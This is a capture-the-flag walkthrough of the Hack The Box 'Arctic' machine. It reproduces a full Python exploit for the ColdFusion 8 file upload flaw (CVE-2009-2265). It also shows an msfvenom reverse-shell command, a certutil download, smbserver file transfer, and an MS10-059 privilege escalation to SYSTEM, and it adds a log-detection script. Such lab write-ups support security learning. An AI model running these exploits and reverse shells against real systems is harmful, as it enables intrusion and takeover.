Prerequisites

This writeup uses msfvenom; skip it if that is not what you want to read.

Information gathering in the browser, especially spotting service details, should not rely too heavily on tools.

MS10-059, smbserver, JSP reverse shell

Information Gathering and Getting a Foothold

Not sure why, but the HTB lab network has been unstable lately.

First use nmap for a quick probe of open ports. The -Pn option is used here: it skips host discovery (no ping), so a host behind a firewall that drops ping probes is still port-scanned instead of being marked down.

nmap -Pn 10.10.10.11

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 12:08 CST
Nmap scan report for 10.10.10.11
Host is up (0.29s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds

Then start a more detailed scan. There is no other information to go on yet, so the detailed nmap output is all there is to read.

nmap -sC -sV -Pn -p- 10.10.10.11

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The only option is to visit these ports and see whether any of them serves a web application: http://10.10.10.11:8500/ and http://10.10.10.11:49154/

There is a web service at http://10.10.10.11:8500/

Check whether it is a known CMS or a component with known vulnerabilities.

whatweb -vv http://10.10.10.11:8500/

http://10.10.10.11:8500/ [200]
Identifying: http://10.10.10.11:8500/
HTTP-Status: 200
[["IP", [{:string=>"10.10.10.11", :certainty=>100}]],["Title", [{:name=>"page title", :string=>"Index of /", :certainty=>100}]],["Country", [{:string=>"RESERVED", :module=>"ZZ", :certainty=>100}]],["Index-Of",[{:text=>"<title>Index of /",:regexp_compiled=>/<title>Index\ of\ \//,:certainty=>100}]],["HTTPServer",[{:name=>"server string", :string=>"JRun Web Server", :certainty=>100}]]]

WhatWeb report for http://10.10.10.11:8500/
Status    : 200 OK
Title     : Index of /
IP        : 10.10.10.11
Country   : RESERVED, ZZ

Summary   : Index-Of, HTTPServer[JRun Web Server]

Detected Plugins:
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : JRun Web Server (from server string)
        {:name=>"server string", :certainty=>100, :string=>"JRun Web Server"}

[ Index-Of ]
        Index of

        {:certainty=>100}

        Google Dorks: (1)

HTTP Headers:
        HTTP/1.0 200 OK
        Date: Wed, 09 Dec 2020 13:26:00 GMT
        Content-Type: text/html; charset=utf-8
        Connection: close
        Server: JRun Web Server

That information is not much use, so I read some files looking for clues, such as http://10.10.10.11:8500/CFIDE/Application.cfm, and saw the following

The component appears to be ColdFusion, so search for related vulnerabilities.

Visiting http://10.10.10.11:8500/CFIDE/administrator/ shows the version is 8.

There is a matching CVE, CVE-2009-2265. It took a long search to find an exploit, and in the end it turned up on the HTB forum: https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload

#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/ColdFusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys, os

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        filename = os.path.basename(sys.argv[4])
        with open(sys.argv[4], 'r') as payload:
            body = payload.read()
    else:
        path = ""
        filename = os.path.basename(sys.argv[3])
        with open(sys.argv[3], 'r') as payload:
            body = payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'
print 'Base filename is {}'.format(filename)

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{}%00".format(filename), files={ 'newfile': ('sploit.txt', body, 'application/x-java-archive' )})
    print 'Base path is {}'.format(basepath)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at {}/userfiles/file/{}'.format(basepath, filename)
    else:
        print 'Failed to upload payload... {} {}'.format(str(req.status_code), req.reason)
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'
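From the defender's side, the exploit above leaves a distinctive trace in the web server access log: a POST to the FCKeditor cfm connector with Command=FileUpload and a null byte in CurrentFolder, followed by a request for the dropped file under /userfiles/file/. The following Python is an added example, not part of the original post, that flags such requests in constructed sample log lines; it assumes a Common Log Format layout for the log.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.10.14.4 - - [09/Dec/2020:13:26:00 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 5123
10.10.14.4 - - [09/Dec/2020:13:27:10 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/hello.jsp%00 HTTP/1.1" 200 312
10.10.14.4 - - [09/Dec/2020:13:27:15 +0000] "GET /userfiles/file/hello.jsp HTTP/1.1" 200 0
10.10.14.9 - - [09/Dec/2020:13:30:00 +0000] "GET /index.cfm HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Path of the FCKeditor connectors shipped with ColdFusion 8 (lower-cased for matching).
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"
# Extensions that the server would execute if they are served from the upload directory.
EXEC_EXT = (".jsp", ".cfm", ".cfml")

def classify(line):
    """Return a reason string if the request looks like CVE-2009-2265 activity, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    if CONNECTOR in path:
        qs = parse_qs(url.query)              # parse_qs percent-decodes, so %00 becomes "\x00"
        folder = qs.get("CurrentFolder", [""])[0]
        if qs.get("Command", [""])[0] == "FileUpload":
            if "\x00" in folder:
                return "FCKeditor upload with null byte in CurrentFolder"
            return "FCKeditor FileUpload command"
        return "FCKeditor connector access"
    # Second stage: the uploaded file being fetched (and therefore executed) from userfiles.
    if path.startswith("/userfiles/file/") and path.endswith(EXEC_EXT) and m.group("status") == "200":
        return "executable file served from userfiles"
    return None

def scan(log_text):
    """Return (src_ip, reason, method, target) for every suspicious line in the log."""
    hits = []
    for line in log_text.splitlines():
        reason = classify(line)
        if reason:
            m = LOG_RE.match(line)
            hits.append((m.group("src"), reason, m.group("method"), m.group("target")))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```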

Looking at the usage, it needs a JSP shell; here I used the one that ships with Kali, /usr/share/webshells/cmdjsp.jsp

python exploit.py 10.10.10.11 8500 /home/bot/shell.jsp

But that failed, because I just could not get it to work properly, so I then tried this shell that someone abroad recommended.

Add the following code as a link in the bookmarks bar, then click it on the cmd.jsp page.

javascript:{window.localStorage.embed=window.atob("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");eval(window.localStorage.embed);};void(0);

It kept throwing errors, though. I tried many things and they all failed, so in the end I had to use a shell generated by msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.4 LPORT=1234 -f raw > hello.jsp

Start an nc listener locally and visit the uploaded file in the browser to receive the shell.

Privilege Escalation

windows-exploit-suggester again

sudo python windows-exploit-suggester.py --database 2020-12-08-mssb.xls --systeminfo Arctic.txt

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

certutil -urlcache -f http://10.10.14.4/JuicyPotato.exe JuicyPotato.exe

The download failed, though, so I had to transfer the file with smbserver instead.

Run this locally to act as the SMB server

sudo smbserver.py share `pwd`

What worked in the end was MS10-059; this is a precompiled version.

net use \\10.10.14.4\share
copy \\10.10.14.4\share\MS10-059.exe

First listen on port 5555 with nc on the local machine.

In the shell, run: MS10-059.exe 10.10.14.4 5555

10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.11] 50197
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>

Below is the privilege escalation attempt that failed.

Back in the earlier shell

net use \\10.10.14.4\share
copy \\10.10.14.4\share\JuicyPotato.exe

Run JuicyPotato.exe; the following commands failed, though.

JuicyPotato.exe -z -l !port! -c %%i >> result.log
JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1337 -c {03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}
